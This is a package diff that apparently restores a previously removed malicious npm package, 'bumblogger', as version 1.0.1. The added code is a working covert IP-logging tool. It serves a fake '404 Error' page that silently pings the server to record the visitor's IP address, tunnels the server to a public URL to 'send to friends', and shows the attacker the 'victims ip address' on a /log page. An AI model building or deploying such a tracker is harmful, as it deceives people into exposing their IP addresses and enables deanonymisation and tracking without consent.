bumblogger 0.0.1-security → 1.0.1

package/index.js

@@ -0,0 +1,49 @@
+#!/usr/bin/env node
+
+const express = require("express");
+const app = express();
+const http = require("http");
+const server = http.createServer(app);
+const requestIp = require("request-ip");
+const localtunnel = require("localtunnel");
+const fetch = require("node-fetch");
+
+
+app.use(requestIp.mw());
+
+const randomURL = async ()=> {
+    let mening = "";
+    for (let i = 0; i < 3; i++) {
+        const req = await fetch.default("https://random-word-api.herokuapp.com/word");
+        const res = await req.json();
+        mening += res[0];
+        
+    }
+    return mening;
+}
+
+
+const startTunnel = async () => {
+    let sub = await randomURL()
+    const tunnel = await localtunnel({port: 3000, subdomain: sub});
+    console.log("Send this to friends: " + tunnel.url);
+    console.log("Open this to see victims ip address: " + tunnel.url + "/log");
+};
+
+startTunnel();
+
+let latestIP = "";
+
+app.set('trust proxy', true);
+app.use(express.static("public"));
+
+app.get('/ip', (req, res) => {
+    res.json({ ip: latestIP });
+});
+
+app.get('/info', (req, res) => {
+    latestIP = req.clientIp;
+    console.log("New IP address recieved: " + latestIP);
+})
+
+server.listen(3000);

package/package.json

@@ -1,6 +1,21 @@
 {
   "name": "bumblogger",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.1",
+  "description": "",
+  "main": "index.js",
+  "bin": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "start": "node index.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "dependencies": {
+    "express": "^4.18.1",
+    "localtunnel": "^2.0.2",
+    "node-fetch": "^2.6.7",
+    "request-ip": "^2.2.0",
+    "socket.io": "^4.5.1"
+  }
 }

package/public/index.html

@@ -0,0 +1,16 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>404 Error</title>
+
+</head>
+<body>
+    404 Error
+    <script>
+        fetch('/info');
+    </script>
+</body>
+</html>

package/public/log/index.html

@@ -0,0 +1,24 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Document</title>
+</head>
+<body>
+    <div id="ip">IP</div>
+    
+    <script>
+        let ip = document.getElementById('ip');
+
+        async function getIP() {
+            let response = await fetch('/ip');
+            let data = await response.json();
+            ip.innerHTML = data.ip;
+        }
+
+        getIP();
+    </script>
+</body>
+</html>

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=bumblogger for more information.